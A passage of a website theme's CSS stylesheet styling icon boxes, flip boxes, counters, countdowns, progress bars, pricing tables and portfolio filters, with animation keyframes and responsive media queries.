  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.icon-box-1 .icon-main {
  background: rgba(254, 132, 35, 0.1);
}

.hover-dark-yes .icon-box-1:hover {
  background: #262832;
}
.hover-dark-yes .icon-box-1:hover .icon-main {
  background: rgba(255, 255, 255, 0.1);
}
.hover-dark-yes .icon-box-1:hover .title-box,
.hover-dark-yes .icon-box-1:hover .title-box a {
  color: #fff;
}
.hover-dark-yes .icon-box-1:hover p {
  color: #ccc;
}
.hover-dark-yes .icon-box-1:hover:after {
  opacity: 0;
}

.with-border-yes .icon-main {
  position: relative;
  margin-top: 15px;
}
.with-border-yes .icon-main .circle-animate {
  position: absolute;
  width: 119px;
  height: 119px;
  left: -15px;
  top: -15px;
  border: 1px solid rgba(0, 0, 0, 0.15);
  -webkit-animation: circle_animation 2s infinite linear;
  -moz-animation: circle_animation 2s infinite linear;
  -o-animation: circle_animation 2s infinite linear;
  animation: circle_animation 2s infinite linear;
  -webkit-animation-play-state: paused;
  -moz-animation-play-state: paused;
  -o-animation-play-state: paused;
  animation-play-state: paused;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.with-border-yes .icon-main .circle-animate:after {
  content: "";
  width: 12px;
  height: 12px;
  background: #1b1d21;
  position: absolute;
  z-index: 1;
  top: 50%;
  left: -6px;
  margin-top: -6px;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.with-border-yes .content-box {
  margin-top: 15px;
}
.with-border-yes.pos-dot-2 .icon-main .circle-animate {
  -webkit-animation: circle_animation_2 2s infinite linear;
  -moz-animation: circle_animation_2 2s infinite linear;
  -o-animation: circle_animation_2 2s infinite linear;
  animation: circle_animation_2 2s infinite linear;
  -webkit-animation-play-state: paused;
  -moz-animation-play-state: paused;
  -o-animation-play-state: paused;
  animation-play-state: paused;
}
.with-border-yes.pos-dot-3 .icon-main .circle-animate {
  -webkit-animation: circle_animation_3 2s infinite linear;
  -moz-animation: circle_animation_3 2s infinite linear;
  -o-animation: circle_animation_3 2s infinite linear;
  animation: circle_animation_3 2s infinite linear;
  -webkit-animation-play-state: paused;
  -moz-animation-play-state: paused;
  -o-animation-play-state: paused;
  animation-play-state: paused;
}
.with-border-yes.pos-dot-4 .icon-main .circle-animate {
  -webkit-animation: circle_animation_4 2s infinite linear;
  -moz-animation: circle_animation_4 2s infinite linear;
  -o-animation: circle_animation_4 2s infinite linear;
  animation: circle_animation_4 2s infinite linear;
  -webkit-animation-play-state: paused;
  -moz-animation-play-state: paused;
  -o-animation-play-state: paused;
  animation-play-state: paused;
}
.with-border-yes .icon-box-1:hover .icon-main .circle-animate {
  -webkit-animation-play-state: running;
  -moz-animation-play-state: running;
  -o-animation-play-state: running;
  animation-play-state: running;
}

/* style 1 icon box 2*/
.icon-box-2 .icon-main {
  float: left;
  width: 75px;
  height: 75px;
  line-height: 75px;
  background: none;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.icon-box-2 .icon-main i {
  line-height: 75px;
  font-size: 45px;
}
.icon-box-2 .icon-main svg {
  width: 45px;
}
.icon-box-2 .content-box {
  margin-left: 95px;
}
.icon-box-2 .title-box {
  padding-top: 11px;
  margin-bottom: 12px;
}
.icon-box-2:hover .icon-main {
  box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -webkit-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -moz-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
}

.icon-right {
  text-align: right;
}
.icon-right .icon-main {
  float: right;
}
.icon-right .content-box {
  margin-left: 0;
  margin-right: 95px;
}

.bline-yes .icon-box-1:after {
  position: absolute;
  content: "";
  width: 70px;
  height: 3px;
  bottom: -2px;
  left: 50%;
  margin-left: -35px;
  background: #fe8423;
  -webkit-border-radius: 1.5px;
  -moz-border-radius: 1.5px;
  border-radius: 1.5px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.bline-yes .icon-box-2 .content-box {
  position: relative;
  padding-bottom: 25px;
  border-bottom: 1px solid rgba(0, 0, 0, 0.1);
}
.bline-yes .icon-box-2 .content-box:after {
  content: "";
  position: absolute;
  right: 0;
  bottom: -1px;
  width: 0;
  background: #fe8423;
  height: 1px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.bline-yes .icon-box-2:hover .content-box:after {
  left: 0;
  right: auto;
  width: 100%;
}

/* style 1 icon box 2*/
.box-s2 .icon-box-2 {
  position: relative;
  padding-left: 35px;
}
.box-s2 .icon-box-2 .icon-main {
  position: absolute;
  left: 0;
  top: 50%;
  z-index: 2;
  -webkit-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  transform: translateY(-50%);
  box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -webkit-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
  -moz-box-shadow: 6px 6px 13px 0 rgba(0, 0, 0, 0.15);
}
.box-s2 .icon-box-2 .content-box {
  margin: 0;
  padding: 35px 35px 35px 70px;
  background: #f5f5f5;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.box-s2 .icon-box-2:hover .content-box {
  background: #fff;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
}
.box-s2.icon-right .icon-box-2 {
  padding-left: 0;
  padding-right: 35px;
}
.box-s2.icon-right .icon-main {
  width: 70px;
  height: 70px;
  line-height: 70px;
  background: #fe8423;
  color: #fff;
  left: auto;
  right: 0;
}
.box-s2.icon-right .icon-main i {
  line-height: 70px;
  font-size: 40px;
}
.box-s2.icon-right .icon-main svg {
  fill: #fff;
}
.box-s2.icon-right .content-box {
  padding: 35px 70px 35px 35px;
}

/*1*/
@-webkit-keyframes circle_animation {
  0% {
    -webkit-transform: rotate(225deg);
    transform: rotate(225deg);
  }
  100% {
    -webkit-transform: rotate(585deg);
    transform: rotate(585deg);
  }
}
@-moz-keyframes circle_animation {
  0% {
    -moz-transform: rotate(225deg);
    transform: rotate(225deg);
  }
  100% {
    -moz-transform: rotate(585deg);
    transform: rotate(585deg);
  }
}
@-o-keyframes circle_animation {
  0% {
    -o-transform: rotate(225deg);
    transform: rotate(225deg);
  }
  100% {
    -o-transform: rotate(585deg);
    transform: rotate(585deg);
  }
}
@keyframes circle_animation {
  0% {
    -webkit-transform: rotate(225deg);
    -moz-transform: rotate(225deg);
    -o-transform: rotate(225deg);
    transform: rotate(225deg);
  }
  100% {
    -webkit-transform: rotate(585deg);
    -moz-transform: rotate(585deg);
    -o-transform: rotate(585deg);
    transform: rotate(585deg);
  }
}
/*2*/
@-webkit-keyframes circle_animation_2 {
  0% {
    -webkit-transform: rotate(-225deg);
    transform: rotate(-225deg);
  }
  100% {
    -webkit-transform: rotate(135deg);
    transform: rotate(135deg);
  }
}
@-moz-keyframes circle_animation_2 {
  0% {
    -moz-transform: rotate(-225deg);
    transform: rotate(-225deg);
  }
  100% {
    -moz-transform: rotate(135deg);
    transform: rotate(135deg);
  }
}
@-o-keyframes circle_animation_2 {
  0% {
    -o-transform: rotate(-225deg);
    transform: rotate(-225deg);
  }
  100% {
    -o-transform: rotate(135deg);
    transform: rotate(135deg);
  }
}
@keyframes circle_animation_2 {
  0% {
    -webkit-transform: rotate(-225deg);
    -moz-transform: rotate(-225deg);
    -o-transform: rotate(-225deg);
    transform: rotate(-225deg);
  }
  100% {
    -webkit-transform: rotate(135deg);
    -moz-transform: rotate(135deg);
    -o-transform: rotate(135deg);
    transform: rotate(135deg);
  }
}
/*3*/
@-webkit-keyframes circle_animation_3 {
  0% {
    -webkit-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -webkit-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}
@-moz-keyframes circle_animation_3 {
  0% {
    -moz-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -moz-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}
@-o-keyframes circle_animation_3 {
  0% {
    -o-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -o-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}
@keyframes circle_animation_3 {
  0% {
    -webkit-transform: rotate(45deg);
    -moz-transform: rotate(45deg);
    -o-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -webkit-transform: rotate(405deg);
    -moz-transform: rotate(405deg);
    -o-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}
/*4*/
@-webkit-keyframes circle_animation_4 {
  0% {
    -webkit-transform: rotate(-45deg);
    transform: rotate(-45deg);
  }
  100% {
    -webkit-transform: rotate(315deg);
    transform: rotate(315deg);
  }
}
@-moz-keyframes circle_animation_4 {
  0% {
    -moz-transform: rotate(-45deg);
    transform: rotate(-45deg);
  }
  100% {
    -moz-transform: rotate(315deg);
    transform: rotate(315deg);
  }
}
@-o-keyframes circle_animation_4 {
  0% {
    -o-transform: rotate(-45deg);
    transform: rotate(-45deg);
  }
  100% {
    -o-transform: rotate(315deg);
    transform: rotate(315deg);
  }
}
@keyframes circle_animation_4 {
  0% {
    -webkit-transform: rotate(-45deg);
    -moz-transform: rotate(-45deg);
    -o-transform: rotate(-45deg);
    transform: rotate(-45deg);
  }
  100% {
    -webkit-transform: rotate(315deg);
    -moz-transform: rotate(315deg);
    -o-transform: rotate(315deg);
    transform: rotate(315deg);
  }
}
/*--------------------------------------------------------------
## Icon Box Grid
--------------------------------------------------------------*/
.icon-box-grid {
  flex-wrap: wrap;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  margin-top: 1px;
  margin-left: 1px;
}
.icon-box-grid .no-padding {
  padding: 0;
  margin-top: -1px;
  margin-left: -1px;
}
.icon-box-grid .icon-box {
  height: 100%;
  padding: 50px;
  border: 1px solid rgba(0, 0, 0, 0.07);
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.icon-box-grid .icon-box .icon-main {
  margin-bottom: 22px;
  line-height: 1;
  color: #fe8423;
  background: 0;
  width: auto;
  height: auto;
}
.icon-box-grid .icon-box .icon-main i {
  font-size: 50px;
  line-height: 1;
}
.icon-box-grid .icon-box .icon-main svg {
  width: 50px;
  fill: #fe8423;
  margin-bottom: -3px;
}
.icon-box-grid .icon-box .content-box .title-box {
  margin-bottom: 10px;
  font-size: 21px;
}
.icon-box-grid .icon-box .content-box .title-box a:hover {
  color: #fe8423;
}
.icon-box-grid .icon-box .content-box p:last-child {
  margin-bottom: 0;
}
.icon-box-grid .icon-box:hover {
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  border-color: transparent;
}
.icon-box-grid .icon-box:hover .title-box {
  color: #1b1d21;
}
.icon-box-grid .icon-box:hover .title-box a {
  color: #1b1d21;
}
.icon-box-grid .icon-box:hover .icon-main {
  color: #fe8423;
}

/*--------------------------------------------------------------
## Image Box
--------------------------------------------------------------*/
.ot-image-box {
  text-align: center;
  overflow: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.ot-image-box .content-box {
  padding: 30px 30px 27px;
  background: #fff;
}
.ot-image-box .content-box .title-box {
  margin-bottom: 15px;
}
.ot-image-box .content-box .title-box a:hover {
  color: inherit;
}
.ot-image-box .content-box p:last-child {
  margin-bottom: 0;
}
.ot-image-box .link-box {
  display: block;
  padding: 10px 30px;
  font-weight: 600;
  font-size: 14px;
  text-transform: uppercase;
  color: #fe8423;
  overflow: hidden;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
}
.ot-image-box .link-box span {
  float: left;
}
.ot-image-box .link-box i {
  float: right;
}
.ot-image-box:hover {
  -webkit-transform: translateY(-15px);
  -ms-transform: translateY(-15px);
  transform: translateY(-15px);
}
.ot-image-box:hover .link-box {
  background: #fe8423;
  border-color: #fe8423;
  color: #fff;
}

.image-box-carousel .owl-stage-outer {
  margin: -30px;
  padding: 30px;
}
.image-box-carousel .owl-stage-outer .owl-item {
  opacity: 0;
  visibility: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.image-box-carousel .owl-stage-outer .owl-item.active {
  opacity: 1;
  visibility: visible;
  transition: all 0s linear;
  -webkit-transition: all 0s linear;
  -moz-transition: all 0s linear;
  -o-transition: all 0s linear;
  -ms-transition: all 0s linear;
}
.image-box-carousel .ot-image-box:hover {
  transform: none;
}

/*--------------------------------------------------------------
## Flip Box
--------------------------------------------------------------*/
.ot-flip-box {
  position: relative;
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
  overflow: hidden;
}
.ot-flip-box .inner-box {
  position: relative;
  transition: all 0.5s linear;
  -webkit-transition: all 0.5s linear;
  -moz-transition: all 0.5s linear;
  -o-transition: all 0.5s linear;
  -ms-transition: all 0.5s linear;
  transform-style: preserve-3d;
}
.ot-flip-box .inner-box > div {
  backface-visibility: hidden;
  transition: all 0.5s linear;
  -webkit-transition: all 0.5s linear;
  -moz-transition: all 0.5s linear;
  -o-transition: all 0.5s linear;
  -ms-transition: all 0.5s linear;
}
.ot-flip-box .number-title {
  position: absolute;
  width: 100%;
  bottom: 0;
  left: 0;
  padding: 35px 40px;
  color: #fff;
}
.ot-flip-box .number-title h4 {
  color: #fff;
  font-weight: 500;
  margin-bottom: 0;
  margin-top: 5px;
  line-height: 42px;
}
.ot-flip-box .number-title span {
  font-family: "Inter", sans-serif;
  font-size: 24px;
}
.ot-flip-box .number-title span:before {
  font-size: 45px;
}
.ot-flip-box .number-title i {
  font-size: 45px;
  margin-bottom: 20px;
  margin-top: 19px;
}
.ot-flip-box .number-title svg {
  width: 150px;
}
.ot-flip-box .overlay {
  z-index: 1;
  opacity: 1;
  text-align: center;
  padding: 30px 40px;
  background: #262832;
  color: #fff;
  overflow: hidden;
  -webkit-transform: rotateY(180deg);
  -ms-transform: rotateY(180deg);
  transform: rotateY(180deg);
}
.ot-flip-box .overlay p {
  margin-bottom: 0;
}
.ot-flip-box .overlay .inner > a {
  display: inline-block;
  margin-top: 23px;
}
.ot-flip-box:hover .inner-box {
  -webkit-transform: rotateY(180deg);
  -ms-transform: rotateY(180deg);
  transform: rotateY(180deg);
}
.ot-flip-box:hover .inner-box .content-box {
  opacity: 0;
}

/*--------------------------------------------------------------
## Client Logos
--------------------------------------------------------------*/
.logos-carousel .owl-stage {
  align-items: center;
  display: flex;
}
.logos-carousel .owl-item {
  text-align: center;
}
.logos-carousel .owl-item figure {
  line-height: inherit;
}
.logos-carousel .owl-item img {
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.logos-carousel .owl-nav button.owl-next,
.logos-carousel .owl-nav button.owl-prev {
  background: transparent;
  color: #1b1d21;
  font-size: 21px;
}
.logos-carousel .owl-nav button.owl-next {
  right: -60px;
}
.logos-carousel .owl-nav button.owl-prev {
  left: -60px;
}

/*--------------------------------------------------------------
## Counter
--------------------------------------------------------------*/
.ot-counter {
  font-family: "Inter", sans-serif;
  display: block;
}
.ot-counter span {
  font-family: "Inter", sans-serif;
  font-weight: 700;
  font-size: 48px;
  color: #fe8423;
  line-height: 1;
  display: inline-block;
}
.ot-counter h6 {
  font-size: 14px;
  line-height: 24px;
  text-transform: uppercase;
  color: #232323;
  font-weight: 600;
  margin-bottom: 0;
  display: inline-block;
}

.number-left .ot-counter {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  align-items: center;
}
.number-left .ot-counter h6 {
  margin-left: 20px;
}

.number-right .ot-counter {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  align-items: center;
  text-align: right;
}
.number-right .ot-counter .c-number {
  order: 2;
}
.number-right .ot-counter h6 {
  margin-right: 20px;
}

.ot-counter-2 {
  text-align: center;
}
.ot-counter-2 svg {
  height: 55px;
  fill: #fe8423;
  display: inline-block;
  margin-bottom: 14px;
}
.ot-counter-2 i {
  font-size: 55px;
  color: #fe8423;
  margin-bottom: 23px;
}
.ot-counter-2 .c-number {
  font-size: 48px;
  font-weight: 700;
  color: #1b1d21;
  line-height: 1;
}
.ot-counter-2 p {
  line-height: 24px;
  margin-top: 7px;
  margin-bottom: 0;
}

/*--------------------------------------------------------------
## Countdown
--------------------------------------------------------------*/
.ot-countdown {
  text-align: center;
  display: flex;
  margin-bottom: 0;
  color: #fff;
}
.ot-countdown li {
  display: inline-block;
  line-height: 1;
  flex-grow: 1;
  flex-basis: 0;
  font-weight: 600;
  color: #60626d;
}
.ot-countdown li span {
  font-size: 100px;
  font-family: "Inter", sans-serif;
  font-weight: 800;
  display: block;
  margin-bottom: 18px;
  white-space: nowrap;
  color: #1a1a1a;
}
.ot-countdown li p {
  margin-bottom: 0;
  font-size: 16px;
  text-transform: uppercase;
  white-space: nowrap;
}
.ot-countdown li.seperator {
  font-size: 72px;
  font-weight: bold;
  color: #fe8423;
  margin-top: 27px;
}

.cs-form {
  text-align: center;
  margin: 0 auto;
  overflow: hidden;
  max-width: 535px;
  justify-content: space-between;
}
.cs-form > span.wpcf7-form-control-wrap {
  max-width: 400px;
  width: 100%;
}
.cs-form > span.wpcf7-form-control-wrap .wpcf7-text {
  color: #5f5f5f;
  width: 100%;
}
.cs-form > span.wpcf7-form-control-wrap .wpcf7-text::placeholder {
  color: #5f5f5f;
}
.cs-form .octf-btn {
  padding: 14px 34px;
}
.cs-form .octf-btn:before, .cs-form .octf-btn:after {
  display: none;
}
.cs-form + div {
  max-width: 475px;
  margin-left: auto !important;
  margin-right: auto !important;
}

@media (max-width: 767px) {
  .ot-countdown li p {
    font-size: 14px;
  }

  .ot-countdown li span,
.ot-countdown li.seperator {
    font-size: 42px;
  }

  .ot-countdown li span {
    margin-bottom: 10px;
  }

  .ot-countdown li.seperator {
    line-height: 55px;
    margin-top: -6px;
  }
}
@media (max-width: 600px) {
  .cs-form {
    display: block;
  }
  .cs-form > span.wpcf7-form-control-wrap {
    margin: 0 auto;
    display: block;
  }
  .cs-form .octf-btn {
    margin-top: 15px;
  }
}
/*--------------------------------------------------------------
## Progress Bars
--------------------------------------------------------------*/
.line-progress h6 {
  font-size: 14px;
  font-weight: 600;
  margin-bottom: 17px;
  text-transform: uppercase;
}
.line-progress .percent {
  position: absolute;
  right: -19px;
  bottom: 100%;
  padding: 4px 5px;
  font-size: 14px;
  font-weight: 600;
  font-family: "Inter", sans-serif;
  line-height: 1;
  background: #262832;
  color: #fff;
  min-width: 40px;
  min-height: 20px;
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
  -webkit-transform: translateY(-15px);
  -ms-transform: translateY(-15px);
  transform: translateY(-15px);
}
.line-progress .iprogress {
  height: 5px;
  margin-bottom: 6px;
  background: #efefef;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
}
.line-progress .progress-bar {
  height: 100%;
  width: 0;
  background: #fe8423;
  position: relative;
  -webkit-transition: all 1s 0.5s;
  -o-transition: all 1s 0.5s;
  transition: all 1s 0.5s;
  -webkit-border-radius: 2px;
  -moz-border-radius: 2px;
  border-radius: 2px;
}

.circle-progress {
  text-align: center;
}
.circle-progress .inner-bar {
  position: relative;
  display: inline-block;
  line-height: 1;
  margin-bottom: -9px;
  z-index: 1;
  background: #f5f5f5;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.circle-progress .inner-bar > span {
  position: absolute;
  width: 100%;
  top: 50%;
  left: 0;
  line-height: 1;
  text-align: center;
  font-weight: 600;
  font-size: 24px;
  color: #1b1d21;
  -webkit-transform: translateY(-50%);
  -ms-transform: translateY(-50%);
  transform: translateY(-50%);
}
.circle-progress .inner-bar > span .percent {
  display: block;
  background: #fff;
  width: 100px;
  height: 100px;
  line-height: 100px;
  margin: auto;
  -webkit-border-radius: 50%;
  -moz-border-radius: 50%;
  border-radius: 50%;
}
.circle-progress .inner-bar canvas {
  display: block;
}
.circle-progress .inner-bar canvas:after {
  content: "x";
}
.circle-progress .inner-bar:after {
  content: "";
  position: absolute;
  left: 1px;
  top: 1px;
  width: calc(100% - 1px);
  height: calc(100% - 1px);
  border-radius: 50%;
  z-index: -1;
  border: 2px solid #dbdbdb;
}
.circle-progress h6 {
  display: block;
  font-size: 14px;
  font-weight: 600;
  line-height: 26px;
  margin-top: 15px;
  margin-bottom: 0;
  text-transform: uppercase;
}

.easyPieChart {
  position: relative;
  text-align: center;
}

.easyPieChart canvas {
  position: absolute;
  top: 0;
  left: 0;
}

@media only screen and (max-width: 480px) {
  .ot-progress .pname {
    margin-bottom: 30px;
  }
}
/*--------------------------------------------------------------
## Switcher
--------------------------------------------------------------*/
.ot-switcher {
  text-align: center;
}
.ot-switcher > span {
  font-size: 14px;
  font-weight: 600;
  vertical-align: middle;
  color: #1b1d21;
}
.ot-switcher .switch {
  margin: 0 15px;
}
.ot-switcher .switch {
  position: relative;
  display: inline-block;
  width: 66px;
  height: 34px;
}
.ot-switcher .switch input {
  opacity: 0;
  width: 0;
  height: 0;
}
.ot-switcher .slider {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: rgba(0, 0, 0, 0.2);
  -webkit-transition: 0.4s;
  transition: 0.4s;
}
.ot-switcher .slider:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 5px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: 0.4s;
  transition: 0.4s;
}
.ot-switcher input:checked + .slider:before {
  -webkit-transform: translateX(29px);
  -ms-transform: translateX(29px);
  transform: translateX(29px);
}
.ot-switcher .slider.round {
  border-radius: 34px;
}
.ot-switcher .slider.round:before {
  border-radius: 50%;
}

/*--------------------------------------------------------------
## Tab Titles
--------------------------------------------------------------*/
.tab-titles {
  justify-content: center;
  margin: -5px;
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
}
.tab-titles .title-item {
  font-size: 14px;
  font-weight: 600;
  text-transform: uppercase;
  display: inline-block;
  vertical-align: middle;
  margin: 5px;
  min-width: 200px;
  text-align: center;
}
.tab-titles .title-item a {
  display: block;
  color: #fff;
  padding: 17px;
  background: rgba(27, 29, 33, 0.2);
  -webkit-border-radius: 3px;
  -moz-border-radius: 3px;
  border-radius: 3px;
}
.tab-titles .title-item a.tab-active,
.tab-titles .title-item a:hover {
  background: #1b1d21;
}

@media (max-width: 767px) {
  .tab-titles,
.tab-titles .title-item {
    display: block;
  }
}
/*--------------------------------------------------------------
## Pricing Table
--------------------------------------------------------------*/
.ot-pricing-table {
  position: relative;
  text-align: center;
  overflow: hidden;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
  box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -moz-box-shadow: 8px 8px 30px 0 rgba(0, 0, 0, 0.12);
  -webkit-border-radius: 5px;
  -moz-border-radius: 5px;
  border-radius: 5px;
}
.ot-pricing-table .inner-table {
  padding: 30px 40px 40px;
  background: #fff;
}
.ot-pricing-table .inner-table .title-table {
  margin-bottom: 35px;
}
.ot-pricing-table .inner-table .title-table span {
  display: inline-block;
  padding: 7px 11px;
  line-height: 1;
  font-size: 13px;
  margin-bottom: 0;
  text-transform: uppercase;
  color: #fff;
  background: #262832;
  -webkit-border-radius: 14px;
  -moz-border-radius: 14px;
  border-radius: 14px;
}
.ot-pricing-table .inner-table h2 {
  font-size: 60px;
  font-weight: 400;
  line-height: 1;
  position: relative;
  display: inline-block;
  padding-left: 27px;
  top: -1px;
  color: #fe8423;
}
.ot-pricing-table .inner-table h2 sup {
  position: absolute;
  top: 15px;
  left: 8px;
  font-size: 24px;
}
.ot-pricing-table .inner-table > p {
  display: inline-block;
  position: relative;
  color: #959595;
  bottom: -9px;
  padding-left: 15px;
  margin-bottom: 40px;
}
.ot-pricing-table .inner-table > p:before {
  position: absolute;
  content: "";
  top: -15px;
  left: 5px;
  width: 1px;
  height: 49px;
  background: #959595;
  -webkit-transform: rotate(40deg);
  -ms-transform: rotate(40deg);
  transform: rotate(40deg);
}
.ot-pricing-table .inner-table .short-text {
  margin-bottom: 32px;
  font-size: 14px;
}
.ot-pricing-table .inner-table .details {
  padding: 26px 0;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
}
.ot-pricing-table .inner-table .details ul {
  list-style: none;
  margin-bottom: 0;
  padding: 0;
  line-height: 42px;
  text-align: left;
}
.ot-pricing-table .inner-table .details ul li {
  position: relative;
  color: #9d9d9d;
}
.ot-pricing-table .inner-table .details ul li:after {
  position: absolute;
  content: "";
  font-family: "Flaticon";
  font-size: 13px;
  right: 0;
  color: #d92300;
}
.ot-pricing-table .inner-table .details ul li.active {
  color: #282828;
}
.ot-pricing-table .inner-table .details ul li.active:after {
  content: "";
  color: #69c47e;
  font-size: 14px;
}
.ot-pricing-table .inner-table .details.no-icon ul li:after {
  display: none;
}
.ot-pricing-table .octf-btn,
.ot-pricing-table .octf-btn:visited {
  color: #1b1d21;
}
.ot-pricing-table .octf-btn:hover,
.ot-pricing-table .octf-btn:visited:hover {
  color: #fff;
}
.ot-pricing-table.is-featured .inner-table {
  color: #fff;
  background: #262832;
}
.ot-pricing-table.is-featured .inner-table .title-table span {
  background: #fe8423;
}
.ot-pricing-table.is-featured .inner-table .details {
  border-color: rgba(255, 255, 255, 0.15);
  color: #8e88b8;
}
.ot-pricing-table.is-featured .inner-table h2,
.ot-pricing-table.is-featured .inner-table .details ul li.active {
  color: #fff;
}
.ot-pricing-table.is-featured .octf-btn {
  background: #fe8423;
  color: #fff;
}
.ot-pricing-table.is-featured .octf-btn:hover {
  background: transparent;
}
.ot-pricing-table:hover {
  -webkit-transform: translateY(-10px);
  -ms-transform: translateY(-10px);
  transform: translateY(-10px);
}

@media (max-width: 1024px) {
  .ot-pricing-table {
    max-width: 400px;
    margin: 0 auto;
  }
}
@media (max-width: 479px) {
  .ot-pricing-table .inner-table h2 {
    font-size: 48px;
  }

  .ot-pricing-table .inner-table .details {
    font-size: 14px;
  }
}
/*--------------------------------------------------------------
## Portfolio
--------------------------------------------------------------*/
/**** isotope filtering ****/
.project_filters {
  position: relative;
  width: 100%;
  text-align: center;
  margin-bottom: 30px;
  padding-left: 0;
}
.project_filters:after {
  content: "";
  display: block;
  clear: both;
}
.project_filters.no-arrow li a:before {
  display: none;
}

.project_filters li {
  position: relative;
  display: inline-block;
  text-align: center;
  margin-left: 15px;
  margin-right: 15px;
  margin-bottom: 5px;
}
.project_filters li:last-child {
  margin-right: 0;
}
.project_filters li:first-child {
  margin-left: 0;
}

.project_filters li a {
  font-size: 14px;
  font-weight: 700;
  font-family: "Inter", sans-serif;
  text-transform: uppercase;
}
.project_filters li a:before {
  content: "";
  font-family: "Flaticon";
  margin-right: 10px;
  opacity: 0;
  color: #fe8423;
  transition: all 0.3s linear;
  -webkit-transition: all 0.3s linear;
  -moz-transition: all 0.3s linear;
  -o-transition: all 0.3s linear;
  -ms-transition: all 0.3s linear;
}
.project_filters li a:focus, .project_filters li a:active {
  color: #1b1d21;
}
.project_filters li a .filter-count {
  position: absolute;
  top: 0;
  right: -20px;
  width: 20px;
  text-align: left;
  font-size: 12px;
  color: #fe8423;
  visibility: hidden;
  opacity: 0;
  transition: all 0.2s linear;
  -webkit-transition: all 0.2s linear;
  -moz-transition: all 0.2s linear;
  -o-transition: all 0.2s linear;
  -ms-transition: all 0.2s linear;
}
.project_filters li a.selected, .project_filters li a:hover {
  color: #fe8423;
}
.project_filters li a.selected:before, .project_filters li a:hover:before {
  opacity: 1;
}
.project_filters li a.selected .filter-count, .project_filters li a:hover .filter-count {
  opacity: 1;
  visibility: visible;
  top: -11px;
}

/* projects-grid
================================================== */
.project-item,
.grid-sizer {
  float: left;
  width: 33.3333333333%;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
}
